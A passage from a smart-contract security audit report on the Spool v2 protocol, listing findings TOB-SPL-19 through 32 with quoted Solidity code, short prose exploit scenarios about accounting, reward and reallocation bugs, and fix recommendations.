_activeUserNFTIds[to][_activeUserNFTCount[to]] = ids[i]; _activeUserNFTCount[to]++; } } Figure 19.1: A snippet of the _afterTokenTransfer function in spool-v2-core/SmartVault.sol When a user transfers an NFT to another user, the function adds the NFT ID to the active NFT IDs of the receiver’s account but does not remove the ID from the active NFT IDs of the sender’s account. Additionally, the active NFT count is not updated for the sender’s account. The getUserSVTBalance function of the SmartVaultManager contract uses the SmartVault contract’s _activeUserNFTIds array to calculate a given user’s SVT balance: function getUserSVTBalance ( address smartVaultAddress , address userAddress ) external view returns ( uint256 ) { if (_accessControl.smartVaultOwner(smartVaultAddress) == userAddress) { (, uint256 ownerSVTs ,, uint256 fees ) = _simulateSync(smartVaultAddress); return ownerSVTs + fees; } uint256 currentBalance = ISmartVault(smartVaultAddress).balanceOf(userAddress); uint256 [] memory nftIds = ISmartVault(smartVaultAddress).activeUserNFTIds(userAddress); if (nftIds.length > 0 ) { currentBalance += _simulateNFTBurn(smartVaultAddress, userAddress, nftIds); } return currentBalance; } Figure 19.2: The getUserSVTBalance function in spool-v2-core/SmartVaultManager.sol Because transferred NFT IDs are active for both senders and receivers, the SVTs corresponding to the NFT IDs will be counted for both users. This double counting will keep increasing the SVT balance for users with every transfer, causing an incorrect balance to be shown to users and third-party integrators. Exploit Scenario Alice deposits assets into a smart vault and receives a D-NFT. Alice's assets are deposited into the protocols after doHardWork is called. Alice transfers the D-NFT to herself. The SmartVault contract adds the D-NFT ID to _activeUserNFTIds for Alice again. Alice checks her SVT balance and sees double the balance she had before. Recommendations Short term, modify the _afterTokenTransfer function so that it removes NFT IDs from the active NFT IDs for the sender’s account when users transfer D-NFTs and W-NFTs. Long term, add unit test cases for all possible user interactions to catch issues such as this. +20. Flawed loop for syncing flushes results in higher management fees Severity: Medium Difficulty: Low Type: Data Validation Finding ID: TOB-SPL-20 Target: manager/SmartVaultManager.sol , manager/DepositManager.sol Description The loop used to sync flush indexes in the SmartVaultManager contract computes an inflated value of the oldTotalSVTs variable, which results in higher management fees paid to the smart vault owner. The _syncSmartVault function in the SmartVaultManager contract implements a loop to process every flush index from flushIndex.toSync to flushIndex.current : while (flushIndex.toSync < flushIndex.current) { ... DepositSyncResult memory syncResult = _depositManager.syncDeposits( smartVault, [flushIndex.toSync, bag.lastDhwSynced, bag.oldTotalSVTs], strategies_, [indexes, _getPreviousDhwIndexes(smartVault, flushIndex.toSync)], tokens, bag.fees ); bag.newSVTs += syncResult.mintedSVTs; bag.feeSVTs += syncResult.feeSVTs; bag.oldTotalSVTs += bag.newSVTs; bag.lastDhwSynced = syncResult.dhwTimestamp; emit SmartVaultSynced(smartVault, flushIndex.toSync); flushIndex.toSync++; } Figure 20.1: A snippet of the _syncSmartVault function in spool-v2-core/SmartVaultManager.sol This loop adds the value of mintedSVTs to the newSVTs variables and then computes the value of oldTotalSVTs by adding newSVTs to it in every iteration. Because mintedSVTs are added in every iteration, new minted SVTs are added for each flush index multiple times when the loop is iterated more than once. The value of oldTotalSVTs is then passed to the syncDeposit function of the DepositManager contract, which uses it to compute the management fee for the smart vault. The use of the inflated value of oldTotalSVTs causes higher management fees to be paid to the smart vault owner. Exploit Scenario Alice deposits assets into a smart vault and flushes it. Before doHardWork is executed, Bob deposits assets into the same smart vault and flushes it. At this point, flushIndex.current has been increased twice for the smart vault. After the execution of doHardWork , the loop to sync the smart vault is iterated twice. As a result, a double management fee is paid to the smart vault owner, and Alice and Bob lose assets. Recommendations Short term, modify the loop so that syncResult.mintedSVTs is added to bag.oldTotalSVTs instead of bag.newSVTs . Long term, be careful when implementing accumulators in loops. Add test cases for multiple interactions to catch such issues. +21. Incorrect ghost strategy check Severity: Informational Difficulty: Medium Type: Data Validation Finding ID: TOB-SPL-21 Target: manager/StrategyRegistry.sol Description The emergencyWithdraw and redeemStrategyShares functions incorrectly check whether a strategy is a ghost strategy after checking that the strategy has a ROLE_STRATEGY role. function emergencyWithdraw( address [] calldata strategies, uint256 [][] calldata withdrawalSlippages, bool removeStrategies ) external onlyRole(ROLE_EMERGENCY_WITHDRAWAL_EXECUTOR, msg.sender ) { for ( uint256 i; i < strategies.length; ++i) { _checkRole(ROLE_STRATEGY, strategies[i]); if (strategies[i] == _ghostStrategy) { continue ; } [...] Figure 21.1: A snippet the emergencyWithdraw function spool-v2-core/StrategyRegistry.sol#L456–L465 function redeemStrategyShares( address [] calldata strategies, uint256 [] calldata shares, uint256 [][] calldata withdrawalSlippages ) external { for ( uint256 i; i < strategies.length; ++i) { _checkRole(ROLE_STRATEGY, strategies[i]); if (strategies[i] == _ghostStrategy) { continue ; } [...] Figure 21.2: A snippet the emergencyWithdraw function spool-v2-core/StrategyRegistry.sol#L477–L486 A ghost strategy will never have the ROLE_STRATEGY role, so both functions will always incorrectly revert if a ghost strategy is passed in the strategies array. Exploit Scenario Bob calls redeemStrategyShares with the ghost strategy in strategies and the transaction unexpectedly reverts. Recommendations Short term, modify the affected functions so that they verify whether the given strategy is a ghost strategy before checking the role with _checkRole . Long term, clearly document which roles a contract should have and implement the appropriate checks to verify them. +22. Reward configuration not initialized properly when reward is zero Severity: Low Difficulty: Low Type: Undefined Behavior Finding ID: TOB-SPL-22 Target: rewards/RewardManager.sol Description The RewardManager.addToken function, which adds a new reward token for the given smart vault, does not initialize all configuration variables when the initial reward is zero. As a result, all calls to the RewardManager.extendRewardEmission function will fail, and rewards cannot be added for that vault. RewardManager.addToken adds a new reward token for the given smart vault. The reward tokens for a smart vault are tracked using the RewardManager.rewardConfiguration function. The tokenAdded value of the configuration is used to check whether the token has already been added for the vault (figure 22.1). function addToken ( address smartVault , IERC20 token, uint32 rewardsDuration , uint256 reward ) external onlyAdminOrVaultAdmin(smartVault, msg.sender ) exceptUnderlying(smartVault, token) { RewardConfiguration storage config = rewardConfiguration [smartVault][token]; if (tokenBlacklist[smartVault][token]) revert RewardTokenBlacklisted( address (token)); if ( config.tokenAdded != 0 ) revert RewardTokenAlreadyAdded( address (token)); if (rewardsDuration == 0 ) revert InvalidRewardDuration(); if (rewardTokensCount[smartVault] > 5 ) revert RewardTokenCapReached(); rewardTokens[smartVault][rewardTokensCount[smartVault]] = token; rewardTokensCount[smartVault]++; config.rewardsDuration = rewardsDuration; if ( reward > 0 ) { _extendRewardEmission(smartVault, token, reward); } } Figure 22.1: The addToken function in spool-v2-core/RewardManager.sol#L81–L101 However, RewardManager.addToken does not update config.tokenAdded , and the _extendRewardEmission function, which updates config.tokenAdded , is called only when the reward is greater than zero. RewardManager.extendRewardEmission is the only entry point to add rewards for a vault. It checks whether token has been previously added by verifying that tokenAdded is greater than zero (figure 22.2). function extendRewardEmission ( address smartVault , IERC20 token, uint256 reward , uint32 rewardsDuration ) external onlyAdminOrVaultAdmin(smartVault, msg.sender ) exceptUnderlying(smartVault, token) { if (tokenBlacklist[smartVault][token]) revert RewardTokenBlacklisted( address (token)); if (rewardsDuration == 0 ) revert InvalidRewardDuration(); if ( rewardConfiguration[smartVault][token].tokenAdded == 0 ) { revert InvalidRewardToken( address (token)); } [...] } Figure 22.2: The extendRewardEmission function in spool-v2-core/RewardManager.sol#L106–L119 Because tokenAdded is not initialized when the initial rewards are zero, the vault admin cannot add the rewards for the vault in that token. The impact of this issue is lower because the vault admin can use the RewardManager.removeReward function to remove the token and add it again with a nonzero initial reward. Note that the vault admin can only remove the token without blacklisting it because the config.periodFinish value is also not initialized when the initial reward is zero. Exploit Scenario Alice is the admin of a smart vault. She adds a reward token for her smart vault with the initial reward set to zero. Alice tries to add rewards using extendRewardEmission , and the transaction fails. She cannot add rewards for her smart vault. She has to remove the token and re-add it with a nonzero initial reward. Recommendations Short term, use a separate Boolean variable to track whether a token has been added for a smart vault, and have RewardManager.addToken initialize that variable. Long term, improve the system’s unit tests to cover all execution paths. +23. Missing function for removing reward tokens from the blacklist Severity: Informational Difficulty: High Type: Undefined Behavior Finding ID: TOB-SPL-23 Target: rewards/RewardManager.sol Description A Spool admin can blacklist a reward token for a smart vault through the RewardManager contract, but they cannot remove it from the blacklist. As a result, a reward token cannot be used again once it is blacklisted. The RewardManager.forceRemoveReward function blacklists the given reward token by updating the RewardManager.tokenBlacklist array (figure 23.1). Blacklisted tokens cannot be used as rewards. function forceRemoveReward ( address smartVault , IERC20 token) external onlyRole(ROLE_SPOOL_ADMIN, msg.sender ) { tokenBlacklist[smartVault][token] = true ; _removeReward(smartVault, token); delete rewardConfiguration[smartVault][token]; } Figure 23.1: The forceRemoveReward function in spool-v2-core/RewardManager.sol#L160–L165 However, RewardManager does not have a function to remove tokens from the blacklist. As a result, if the Spool admin accidentally blacklists a token, then the smart vault admin will never be able to use that token to send rewards. Exploit Scenario Alice is the admin of a smart vault. She adds WETH and token A as rewards. The value of token A declines rapidly, so a Spool admin decides to blacklist the token for Alice’s vault. The Spool admin accidentally supplies the WETH address in the call to forceRemoveReward . As a result, WETH is blacklisted, and Alice cannot send rewards in WETH. Recommendations Short term, add a function with the proper access controls to remove tokens from the blacklist. Long term, improve the system’s unit tests to cover all execution paths. +24. Risk of unclaimed shares due to loss of precision in reallocation operations Severity: Informational Difficulty: Low Type: Undefined Behavior Finding ID: TOB-SPL-24 Target: libraries/ReallocationLib.sol Description The ReallocationLib.calculateReallocation function releases strategy shares and calculates their USD value. The USD value is later converted into strategy shares in the ReallocationLib.doReallocation function. Because the conversion operations always round down, the number of shares calculated in doReallocation will be less than the shares released in calculateReallocation . As a result, some shares released in calculateReallocation will be unclaimed, as ReallocationLib distributes only the shares computed in doReallocation . ReallocationLib.calculateAllocation calculates the USD value that needs to be withdrawn from each of the strategies used by smart vaults (figure 24.1). The smart vaults release the shares equivalent to the calculated USD value. /** * @dev Calculates reallocation needed per smart vault. [...] * @return Reallocation of the smart vault: * - first index is 0 or 1 * - 0: * - second index runs over smart vault's strategies * - value is USD value that needs to be withdrawn from the strategy [...] */ function calculateReallocation ( [...] ) private returns ( uint256 [][] memory ) { [...] } else if (targetValue < currentValue) { // This strategy needs withdrawal. [...] IStrategy(smartVaultStrategies[i]). releaseShares (smartVault, sharesToRedeem ); // Recalculate value to withdraw based on released shares. reallocation[ 0 ][i] = IStrategy(smartVaultStrategies[i]).totalUsdValue() * sharesToRedeem / IStrategy(smartVaultStrategies[i]).totalSupply(); } } return reallocation ; } Figure 24.1: The calculateReallocation function in spool-v2-core/ReallocationLib.sol#L161–L207 The ReallocationLib.buildReallocationTable function calculates the reallocationTable value. The reallocationTable[i][j][0] value represents the USD amount that should move from strategy i to strategy j (figure 24.2). These USD amounts are calculated using the USD values of the released shares computed in ReallocationLib.calculateReallocation (represented by reallocation[0][i] in figure 24.1). /** [...] * @return Reallocation table: * - first index runs over all strategies i * - second index runs over all strategies j * - third index is 0, 1 or 2 * - 0: value represent USD value that should be withdrawn by strategy i and deposited into strategy j */ function buildReallocationTable ( [...] ) private pure returns ( uint256 [][][] memory ) { Figure 24.2: A snippet of buildReallocationTable function in spool-v2-core/ReallocationLib.sol#L209–L228 ReallocationLib.doReallocation calculates the total USD amount that should be withdrawn from a strategy (figure 24.3). This total USD amount is exactly equal to the sum of the USD values needed to be withdrawn from the strategy for each of the smart vaults. The doReallocation function converts the total USD value to the equivalent number of strategy shares. The ReallocationLib library withdraws this exact number of shares from the strategy and distributes them to other strategies that require deposits of these shares. function doReallocation ( [...] uint256 [][][] memory reallocationTable ) private { // Distribute matched shares and withdraw unamatched ones. for ( uint256 i ; i < strategies.length; ++i) { [...] { uint256 [ 2 ] memory totals; // totals[0] -> total withdrawals for ( uint256 j ; j < strategies.length; ++j) { totals[ 0 ] += reallocationTable[i][j][ 0 ] ; [...] } // Calculate amount of shares to redeem and to distribute. uint256 sharesToDistribute = // first store here total amount of shares that should have been withdrawn IStrategy(strategies[i]).totalSupply() * totals[ 0 ] / IStrategy(strategies[i]).totalUsdValue(); [...] } [...] Figure 24.3: A snippet of the doReallocation function in spool-v2-core/ReallocationLib.sol#L285–L350 Theoretically, the shares calculated for a strategy should be equal to the shares released by all of the smart vaults for that strategy. However, there is a loss of precision in both the calculateReallocation function’s calculation of the USD value of released shares and the doReallocation function’s conversion of the combined USD value to strategy shares. As a result, the number of shares released by all of the smart vaults will be less than the shares calculated in calculateReallocation . Because the ReallocationLib library only distributes these calculated shares, there will be some unclaimed strategy shares as dust. It is important to note that the rounding error could be greater than one in the context of multiple smart vaults. Additionally, the error could be even greater if the conversion results were rounded in the opposite direction: in that case, if the calculated shares were greater than the released shares, the reallocation would fail when burn and claim operations are executed. Recommendations Short term, modify the code so that it stores the number of shares released in calculateReallocation , and implement dustless calculations to build the reallocationTable value with the share amounts and the USD amounts. Have doReallocation use this reallocationTable value to calculate the value of sharesToDistribute . Long term, use Echidna to test system and mathematical invariants. +25. Curve3CoinPoolAdapter’s _addLiquidity reverts due to incorrect amounts deposited Severity: Medium Difficulty: Low Type: Undefined Behavior Finding ID: TOB-SPL-25 Target: strategies/curve/CurveAdapter.sol Description The _addLiquidity function loops through the amounts array but uses an additional element to keep track of whether deposits need to be made in the Strategy.doHardWork function. As a result, _addLiquidity overwrites the number of tokens to send for the first asset, causing far fewer tokens to be deposited than expected, thus causing the transaction to revert due to the slippage check. function _addLiquidity( uint256 [] memory amounts, uint256 slippage) internal { uint256 [N_COINS] memory curveAmounts; for ( uint256 i; i < amounts.length; ++i) { curveAmounts[assetMapping().get(i)] = amounts[i]; } ICurve3CoinPool(pool()).add_liquidity(curveAmounts, slippage); } Figure 25.1: The _addLiquidity function in spool-v2-core/CurveAdapter.sol#L12–L20 The last element in the doHardWork function’s assetsToDeposit array keeps track of the deposits to be made and is incremented by one on each iteration of assets in assetGroup if that asset has tokens to deposit. This variable is then passed to the _depositToProtocol function and then, for strategies that use the Curve3CoinPoolAdapter , is passed to _addLiquidity in the amounts parameter. When _addLiquidity iterates over the last element in the amounts array, the assetMapping().get(i) function will return 0 because i in assetMapping is uninitialized. This return value will overwrite the number of tokens to deposit for the first asset with a strictly smaller amount. function doHardWork(StrategyDhwParameterBag calldata dhwParams) external returns (DhwInfo memory dhwInfo) { _checkRole(ROLE_STRATEGY_REGISTRY, msg.sender ); // assetsToDeposit[0..token.length-1]: amount of asset i to deposit // assetsToDeposit[token.length]: is there anything to deposit uint256 [] memory assetsToDeposit = new uint256 [](dhwParams.assetGroup.length + 1); unchecked { for ( uint256 i; i < dhwParams.assetGroup.length; ++i) { assetsToDeposit[i] = IERC20(dhwParams.assetGroup[i]).balanceOf(address(this)); if (assetsToDeposit[i] > 0) { ++assetsToDeposit[dhwParams.assetGroup.length]; } } } [...] // - deposit assets into the protocol _depositToProtocol(dhwParams.assetGroup, assetsToDeposit, dhwParams.slippages); Figure 25.2: A snippet of the doHardWork function in spool-v2-core/Strategy.sol#L71–L75 Exploit Scenario The doHardWork function is called for a smart vault that uses the ConvexAlusdStrategy strategy; however, the subsequent call to _addLiquidity reverts due to the incorrect number of assets that it is trying to deposit. The smart vault is unusable. Recommendations Short term, have _addLiquidity loop the amounts array for N_COINS time instead of its length. Long term, refactor the Strategy.doHardWork function so that it does not use an additional element in the assetsToDeposit array to keep track of whether deposits need to be made. Instead, use a separate Boolean variable. The current pattern is too error-prone. +26. Reallocation process reverts when a ghost strategy is present Severity: High Difficulty: High Type: Data Validation Finding ID: TOB-SPL-26 Target: libraries/ReallocationLib.sol Description The reallocation process reverts in multiple places when a ghost strategy is present. As a result, it is impossible to reallocate a smart vault with a ghost strategy. The first revert would occur in the mapStrategies function (figure 26.1). Users calling the reallocate function would not know to add the ghost strategy address in the strategies array, which holds the strategies that need to be reallocated. This function reverts if it does not find a strategy in the array. Even if the ghost strategy address is in strategies , a revert would occur in the areas described below. function mapStrategies( address [] calldata smartVaults, address [] calldata strategies, mapping ( address => address []) storage _smartVaultStrategies ) private view returns ( uint256 [][] memory ) { [...] // Loop over smart vault's strategies. for ( uint256 j; j < smartVaultStrategiesLength; ++j) { address strategy = smartVaultStrategies[j]; bool found = false ; // Try to find the strategy in the provided list of strategies. for ( uint256 k; k < strategies.length; ++k) { if (strategies[k] == strategy) { // Match found. found = true ; strategyMatched[k] = true ; // Add entry to the strategy mapping. strategyMapping[i][j] = k; break ; } } if (!found) { list // If a smart vault's strategy was not found in the provided // of strategies, this means that the provided list is invalid. revert InvalidStrategies(); } } } Figure 26.1: A snippet of the mapStrategies function in spool-v2-core/ReallocationLib.sol#L86–L144 During the reallocation process, the doReallocation function calls the beforeRedeemalCheck and beforeDepositCheck functions even on ghost strategies (figure 26.2); however, their implementation is to revert on ghost strategies with an IsGhostStrategy error (figure 26.3) . function doReallocation( address [] calldata strategies, ReallocationParameterBag calldata reallocationParams, uint256 [][][] memory reallocationTable ) private { if (totals[0] == 0) { reallocationParams.withdrawalSlippages[i]); IStrategy(strategies[i]).beforeRedeemalCheck(0, // There is nothing to withdraw from strategy i. continue ; } // Calculate amount of shares to redeem and to distribute. uint256 sharesToDistribute = // first store here total amount of shares that should have been withdrawn IStrategy(strategies[i]).totalUsdValue(); IStrategy(strategies[i]).totalSupply() * totals[0] / IStrategy(strategies[i]).beforeRedeemalCheck( sharesToDistribute, reallocationParams.withdrawalSlippages[i] ); [...] // Deposit assets into the underlying protocols. for ( uint256 i; i < strategies.length; ++i) { IStrategy(strategies[i]).beforeDepositCheck(toDeposit[i], reallocationParams.depositSlippages[i]); [...] Figure 26.2: A snippet of the doReallocation function in spool-v2-core/ReallocationLib.sol#L285–L 469 contract GhostStrategy is IERC20Upgradeable, IStrategy { [...] function beforeDepositCheck( uint256 [] memory , uint256 [] calldata ) external pure { revert IsGhostStrategy(); } function beforeRedeemalCheck( uint256 , uint256 [] calldata ) external pure { revert IsGhostStrategy(); } Figure 26.3: The beforeDepositCheck and beforeRedeemalCheck functions in spool-v2-core/GhostStrategy.sol#L98–L104 Exploit Scenario A strategy is removed from a smart vault. Bob, who has the ROLE_ALLOCATOR role, calls reallocate , but it reverts and the smart vault is impossible to reallocate. Recommendations Short term, modify the associated code so that ghost strategies are not passed to the reallocate function in the _smartVaultStrategies parameter. Long term, improve the system’s unit and integration tests to test for smart vaults with ghost strategies. Such tests are currently missing. +27. Broken test cases that hide security issues Severity: Informational Difficulty: Undetermined Type: Testing Finding ID: TOB-SPL-27 Target: test/RewardManager.t.sol , test/integration/RemoveStrategy.t.sol Description Multiple test cases do not check sufficient conditions to verify the correctness of the code, which could result in the deployment of buggy code in production and the loss of funds. The test_extendRewardEmission_ok test does not check the new reward rate and duration to verify the effect of the call to the extendRewardEmission function on the RewardManager contract: function test_extendRewardEmission_ok() public { deal(address(rewardToken), vaultOwner, rewardAmount * 2, true); vm.startPrank(vaultOwner); rewardToken.approve(address(rewardManager), rewardAmount * 2); rewardManager.addToken(smartVault, rewardToken, rewardDuration, rewardAmount); rewardManager.extendRewardEmission(smartVault, rewardToken, 1 ether, rewardDuration); vm.stopPrank(); } Figure 27.1: An insufficient test case for extendRewardEmission spool-v2-core/RewardManager.t.sol The test_removeReward_ok test does not check the new reward token count and the deletion of the reward configuration for the smart vault to verify the effect of the call to the removeReward function on the RewardManager contract: function test_removeReward_ok() public { deal(address(rewardToken), vaultOwner, rewardAmount, true); vm.startPrank(vaultOwner); rewardToken.approve(address(rewardManager), rewardAmount); rewardManager.addToken(smartVault, rewardToken, rewardDuration, rewardAmount); skip(rewardDuration + 1); rewardManager.removeReward(smartVault, rewardToken); vm.stopPrank(); } Figure 27.2: An insufficient test case for removeReward spool-v2-core/RewardManager.t.sol There is no test case to check the access controls of the removeReward function. Similarly, the test_forceRemoveReward_ok test does not check the effects of the forced removal of a reward token. Findings TOB-SPL-28 and TOB-SPL-29 were not detected by tests because of these broken test cases. The test_removeStrategy_betweenFlushAndDHW test does not check the balance of the master wallet. The test_removeStrategy_betweenFlushAndDhwWithdrawals test removes the strategy before the “do hard work” execution of the deposit cycle instead of removing it before the “do hard work” execution of the withdrawal cycle, making this test case redundant. Finding TOB-SPL-33 would have been detected if this test had been correctly implemented. There may be other broken tests that we did not find, as we could not cover all of the test cases. Exploit Scenario The Spool team deploys the protocol. After some time, the Spool team makes some changes in the code that introduces a bug that goes unnoticed due to the broken test cases. The team deploys the new changes with confidence in their tests and ends up introducing a security issue in the production deployment of the protocol. Recommendations Short term, fix the test cases described above. Long term, review all of the system’s test cases and make sure that they verify the given state change correctly and sufficiently after an interaction with the protocol. Use Necessist to find broken test cases and fix them. +28. Reward emission can be extended for a removed reward token Severity: Medium Difficulty: Medium Type: Data Validation Finding ID: TOB-SPL-28 Target: rewards/RewardManager.sol Description Smart vault owners can extend the reward emission for a removed token, which may cause tokens to be stuck in the RewardManager contract. The removeReward function in the RewardManager contract calls the _removeReward function, which does not remove the reward configuration: function _removeReward( address smartVault, IERC20 token) private { uint256 _rewardTokensCount = rewardTokensCount[smartVault]; for ( uint256 i; i < _rewardTokensCount; ++i) { if (rewardTokens[smartVault][i] == token) { rewardTokens[smartVault][i] = rewardTokens[smartVault][_rewardTokensCount - 1]; delete rewardTokens[smartVault][_rewardTokensCount- 1]; rewardTokensCount[smartVault]--; emit RewardRemoved(smartVault, token); break ; } } } Figure 28.1: The _removeReward function in spool-v2-core/RewardManger.sol The extendRewardEmission function checks whether the value of tokenAdded in the rewardConfiguration[smartVault][token] configuration is not zero to make sure that the token was already added to the smart vault: function extendRewardEmission( address smartVault, IERC20 token, uint256 reward, uint32 rewardsDuration) external onlyAdminOrVaultAdmin(smartVault, msg.sender ) exceptUnderlying(smartVault, token) { if (tokenBlacklist[smartVault][token]) revert RewardTokenBlacklisted(address(token)); if (rewardsDuration == 0) revert InvalidRewardDuration(); if (rewardConfiguration[smartVault][token].tokenAdded == 0) { revert InvalidRewardToken(address(token)); } rewardConfiguration[smartVault][token].rewardsDuration = rewardsDuration; _extendRewardEmission(smartVault, token, reward); } Figure 28.2: The extendRewardEmission function in spool-v2-core/RewardManger.sol After removing a reward token from a smart vault, the value of tokenAdded in the rewardConfiguration[smartVault][token] configuration is left as nonzero, which allows the smart vault owner to extend the reward emission for the removed token. Exploit Scenario Alice adds a reward token A to her smart vault S. After a month, she removes token A from her smart vault. After some time, she forgets that she removed token A from her vault. She calls extendRewardEmission with 1,000 token A as the reward. The amount of token A is transferred from Alice to the RewardManager contract, but it is not distributed to the users because it is not present in the list of reward tokens added for smart vault S. The 1,000 tokens are stuck in the RewardManager contract. Recommendations Short term, modify the associated code so that it deletes the rewardConfiguration[smartVault][token] configuration when removing a reward token for a smart vault. Long term, add test cases to check for expected user interactions to catch bugs such as this. +29. A reward token cannot be added once it is removed from a smart vault Severity: Low Difficulty: Low Type: Data Validation Finding ID: TOB-SPL-29 Target: rewards/RewardManager.sol Description Smart vault owners cannot add reward tokens again after they have been removed once from the smart vault, making owners incapable of providing incentives to users. The removeReward function in the RewardManager contract calls the _removeReward function, which does not remove the reward configuration: function _removeReward( address smartVault, IERC20 token) private { uint256 _rewardTokensCount = rewardTokensCount[smartVault]; for ( uint256 i; i < _rewardTokensCount; ++i) { if (rewardTokens[smartVault][i] == token) { rewardTokens[smartVault][i] = rewardTokens[smartVault][_rewardTokensCount - 1]; delete rewardTokens[smartVault][_rewardTokensCount- 1]; rewardTokensCount[smartVault]--; emit RewardRemoved(smartVault, token); break ; } } } Figure 29.1: The _removeReward function in spool-v2-core/RewardManger.sol The addToken function checks whether the value of tokenAdded in the rewardConfiguration[smartVault][token] configuration is zero to make sure that the token was not already added to the smart vault: function addToken( address smartVault, IERC20 token, uint32 rewardsDuration, uint256 reward) external onlyAdminOrVaultAdmin(smartVault, msg.sender ) exceptUnderlying(smartVault, token) { RewardConfiguration storage config = rewardConfiguration[smartVault][token]; if (tokenBlacklist[smartVault][token]) revert RewardTokenBlacklisted(address(token)); if (config.tokenAdded != 0) revert RewardTokenAlreadyAdded(address(token)); if (rewardsDuration == 0) revert InvalidRewardDuration(); if (rewardTokensCount[smartVault] > 5) revert RewardTokenCapReached(); rewardTokens[smartVault][rewardTokensCount[smartVault]] = token; rewardTokensCount[smartVault]++; config.rewardsDuration = rewardsDuration; if (reward > 0) { _extendRewardEmission(smartVault, token, reward); } } Figure 29.2: The addToken function in spool-v2-core/RewardManger.sol After a reward token is removed from a smart vault, the value of tokenAdded in the rewardConfiguration[smartVault][token] configuration is left as nonzero, which prevents the smart vault owner from adding the token again for reward distribution as an incentive to the users of the smart vault. Exploit Scenario Alice adds a reward token A to her smart vault S. After a month, she removes token A from her smart vault. Noticing the success of her earlier reward incentive program, she wants to add reward token A to her smart vault again, but her transaction to add the reward token reverts, leaving her with no choice but to distribute another token. Recommendations Short term, modify the associated code so that it deletes the rewardConfiguration[smartVault][token] configuration when removing a reward token for a smart vault. Long term, add test cases to check for expected user interactions to catch bugs such as this. +30. Missing whenNotPaused modifier Severity: Low Difficulty: Low Type: Undefined Behavior Finding ID: TOB-SPL-30 Target: rewards/RewardPool.sol Description The documentation specifies which functionalities should not be working when the system is paused, including the claiming of rewards; however, the claim function does not have the whenNotPaused modifier. As a result, users can claim their rewards even when the system is paused. If the system is paused: - users can’t claim vault incentives - [...] Figure 30.1: A snippet of the provided Spool documentation function claim(ClaimRequest[] calldata data) public { Figure 30.2: The claim function header in spool-v2-core/RewardPool.sol#L47 Exploit Scenario Alice, who has the ROLE_PAUSER role in the system, pauses the protocol after she sees a possible vulnerability in the claim function. The Spool team believes there are no possible funds moving from the system; however, users can still claim their rewards. Recommendations Short term, add the whenNotPaused modifier to the claim function. Long term, improve the system’s unit and integration tests by adding a test to verify that the expected functionalities do not work when the system is in a paused state. +31. Users who deposit and then withdraw before doHardWork lose their tokens Severity: High Difficulty: Low Type: Undefined Behavior Finding ID: TOB-SPL-31 Target: managers/DepositManager.sol Description Users who deposit and then withdraw assets before doHardWork is called will receive zero tokens from their withdrawal operations. When a user deposits assets, the depositAssets function mints an NFT with some metadata to the user who can later redeem it for the underlying SVT tokens. function depositAssets(DepositBag calldata bag, DepositExtras calldata bag2) external onlyRole(ROLE_SMART_VAULT_MANAGER, msg.sender) returns ( uint256 [] memory , uint256 ) { [...] // mint deposit NFT DepositMetadata memory metadata = DepositMetadata(bag.assets, block.timestamp , bag2.flushIndex); uint256 depositId = ISmartVault(bag.smartVault).mintDepositNFT(bag.receiver, metadata); [...] } Figure 31.1: A snippet of the depositAssets function in spool-v2-core/DepositManager.sol#L379–L439 Users call the claimSmartVaultTokens function in the SmartVaultManager contract to claim SVT tokens. It is important to note that this function calls the _syncSmartVault function with false as the last argument, which means that it will not revert if the current flush index and the flush index to sync are the same. Then, claimSmartVaultTokens delegates the work to the corresponding function in the DepositManager contract. function claimSmartVaultTokens( address smartVault, uint256 [] calldata nftIds, uint256 [] calldata nftAmounts) public whenNotPaused returns ( uint256 ) { _onlyRegisteredSmartVault(smartVault); address [] memory tokens = _assetGroupRegistry.listAssetGroup(_smartVaultAssetGroups[smartVault]); _syncSmartVault(smartVault, _smartVaultStrategies[smartVault], tokens, false ); return _depositManager.claimSmartVaultTokens(smartVault, nftIds, nftAmounts, tokens, msg.sender ); } Figure 31.2: A snippet of the claimSmartVaultTokens function in spool-v2-core/SmartVaultManager.sol#L238–L247 Later, the claimSmartVaultTokens function in DepositManager (figure 31.3) computes the SVT tokens that users will receive by calling the getClaimedVaultTokensPreview function and passing the bag.mintedSVTs value for the flush corresponding to the burned NFT. function claimSmartVaultTokens( address smartVault, uint256 [] calldata nftIds, uint256 [] calldata nftAmounts, address [] calldata tokens, address executor ) external returns ( uint256 ) { _checkRole(ROLE_SMART_VAULT_MANAGER, msg.sender ); [...] ClaimTokensLocalBag memory bag; ISmartVault vault = ISmartVault(smartVault); bag.metadata = vault.burnNFTs(executor, nftIds, nftAmounts); for ( uint256 i; i < nftIds.length; ++i) { if (nftIds[i] > MAXIMAL_DEPOSIT_ID) { revert InvalidDepositNftId(nftIds[i]); } // we can pass empty strategy array and empty DHW index array, // because vault should already be synced and mintedVaultShares values available bag.data = abi.decode(bag.metadata[i], (DepositMetadata)); bag.mintedSVTs = _flushShares[smartVault][bag.data.flushIndex].mintedVaultShares; claimedVaultTokens += getClaimedVaultTokensPreview(smartVault, bag.data, nftAmounts[i], bag.mintedSVTs , tokens); } Figure 31.3: A snippet of the claimSmartVaultTokens in spool-v2-core/DepositManager.sol#L135–L184 Then, getClaimedVaultTokensPreview calculates the SVT tokens proportional to the amount deposited. function getClaimedVaultTokensPreview( address smartVaultAddress, DepositMetadata memory data, uint256 nftShares, uint256 mintedSVTs, address [] calldata tokens ) public view returns ( uint256 ) { [...] for ( uint256 i; i < data.assets.length; ++i) { depositedUsd += _priceFeedManager.assetToUsdCustomPrice(tokens[i], data.assets[i], exchangeRates[i]); totalDepositedUsd += totalDepositedAssets[i], exchangeRates[i]); _priceFeedManager.assetToUsdCustomPrice(tokens[i], } uint256 claimedVaultTokens = mintedSVTs * depositedUsd / totalDepositedUsd; return claimedVaultTokens * nftShares / NFT_MINTED_SHARES; } Figure 31.4: A snippet of the getClaimedVaultTokensPreview function in spool-v2-core/DepositManager.sol#L546–L572 However, the value of _flushShares[smartVault][bag.data.flushIndex].mintedVaultShares , shown in figure 31.3, will always be 0 : the value is updated in the syncDeposit function, but because the current flush cycle is not finished yet, syncDeposit cannot be called through syncSmartVault . The same problem appears in the redeem , redeemFast , and claimWithdrawal functions. Exploit Scenario Bob deposits assets into a smart vault, but he notices that he deposited in the wrong smart vault. He calls redeem and claimWithdrawal , expecting to receive back his tokens, but he receives zero tokens. The tokens are locked in the smart contracts. Recommendations Short term, do not allow users to withdraw tokens when the corresponding flush has not yet happened. Long term, document and test the expected effects when calling functions in all of the possible orders, and add adequate constraints to avoid unexpected behavior. +32. Lack of events emitted for state-changing functions Severity: Informational Difficulty: Low Type: Auditing and Logging Finding ID: TOB-SPL-32 Target: src/ Description Multiple critical operations do not emit events. 